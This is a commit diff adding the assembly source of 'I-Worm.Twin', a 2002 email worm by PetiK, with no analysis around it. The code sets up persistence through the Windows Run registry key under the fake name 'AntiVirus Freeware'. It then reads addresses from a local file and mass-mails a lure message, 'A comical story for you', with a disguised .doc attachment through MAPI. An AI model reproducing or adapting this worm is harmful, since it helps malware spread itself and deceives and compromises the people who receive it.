Add files via upload

2026-06-16 15:59:24 +00:00 · 2020-10-09 22:16:57 -05:00
parent 9cbdb38457
commit 1ffdfd1526
85 changed files with 21199 additions and 0 deletions
@@ -0,0 +1,198 @@
+comment #
+Name : I-Worm.Twin
+Author : PetiK
+Date : January 30th 2002 - February 1st 2002
+Size : 6656 bytes
+
+Action : See yourself. It's not complex.
+#
+
+.586p
+.model flat
+.code
+
+JUMPS
+
+api macro a
+extrn a:proc
+call a
+endm
+
+include useful.inc
+include myinclude.inc
+
+start:	push	50
+	mov	esi,offset orig_worm
+	push	esi
+	push	0
+	api	GetModuleFileNameA
+
+	push	25
+	push	esi
+	push	1
+	@pushsz	"AntiVirus Freeware"
+	@pushsz	"Software\Microsoft\Windows\CurrentVersion\Run"
+	push	80000002h
+	api	SHSetValueA
+
+	@pushsz "C:\twin.vbs"
+	api	DeleteFileA
+
+	push	50
+	push	offset pathname
+	api	GetWindowsDirectoryA
+	@pushsz	"\NetInfo.doc"
+	push	offset pathname
+	api	lstrcat
+
+verif_inet:
+	push	0
+	push	offset inet
+	api	InternetGetConnectedState
+	dec	eax
+	jnz	verif_inet
+
+	push	0
+	push	0
+	push	3
+	push	0
+	push	1
+	push	80000000h
+	@pushsz	"C:\backup.win"
+	api	CreateFileA
+	inc	eax
+	je	end_worm
+	dec	eax
+	xchg	ebx,eax
+
+	push	0
+	push	0
+	push	0
+	push	2
+	push	0
+	push	ebx
+	api	CreateFileMappingA
+	test	eax,eax
+	je	end_w1
+	xchg	eax,ebp
+
+	push	0
+	push	0
+	push	0
+	push	4
+	push	ebp
+	api	MapViewOfFile
+	test	eax,eax
+	je	end_w2
+	xchg	eax,esi
+
+	push	0
+	push	ebx
+	api	GetFileSize
+	cmp	eax,3
+	jbe	end_w3
+
+scan_mail:
+	xor	edx,edx
+	mov	edi,offset mail_addr
+	push	edi
+	p_c:	lodsb
+	cmp	al," "
+	je	car_s
+	cmp	al,0dh
+	je	entr1
+	cmp	al,0ah
+	je	entr2
+	cmp	al,"#"
+	je	f_mail
+	cmp	al,'@'
+	jne	not_a
+	inc	edx
+	not_a:	stosb
+		jmp p_c
+	car_s:	inc esi
+		jmp p_c
+	entr1:	xor al,al
+		stosb
+		pop edi
+		test edx,edx
+		je  scan_mail
+		call send_mail
+		jmp scan_mail
+	entr2:	xor al,al
+		stosb
+		pop edi
+		jmp scan_mail
+	f_mail:
+
+end_w3:	push	esi
+	api	UnmapViewOfFile
+end_w2:	push	ebp
+	api	CloseHandle
+end_w1:	push	ebx
+	api	CloseHandle
+
+
+end_worm:
+	push	0
+	api	ExitProcess
+
+send_mail:
+	xor	eax,eax
+	push	eax
+	push	eax
+	push	offset Message
+	push	eax
+	push	[sess]
+	api	MAPISendMail
+	ret
+
+.data
+orig_worm	db 50 dup (0)
+pathname	db 50 dup (0)
+mail_addr	db 128 dup (?)
+inet		dd 0
+sess		dd 0
+
+subject		db "A comical story for you.",0
+body		db "I send you a comical story found on the Net.",0dh,0ah,0dh,0ah
+		db 9,"Best Regards. You friend.",0
+filename	db "comical_story.doc",0
+
+Message		dd ?
+		dd offset subject
+		dd offset body
+		dd ?
+		dd ?
+		dd ?
+		dd 2
+		dd offset MsgFrom
+		dd 1
+		dd offset MsgTo
+		dd 1
+		dd offset Attach
+
+MsgFrom		dd ?
+		dd ?
+		dd ?
+		dd ?
+		dd ?
+		dd ?
+
+MsgTo		dd ?
+		dd 1
+		dd offset mail_addr
+		dd offset mail_addr
+		dd ?
+		dd ?
+
+Attach		dd ?
+		dd ?
+		dd ?
+		dd offset pathname
+		dd offset filename
+		dd ?
+
+
+end start
+end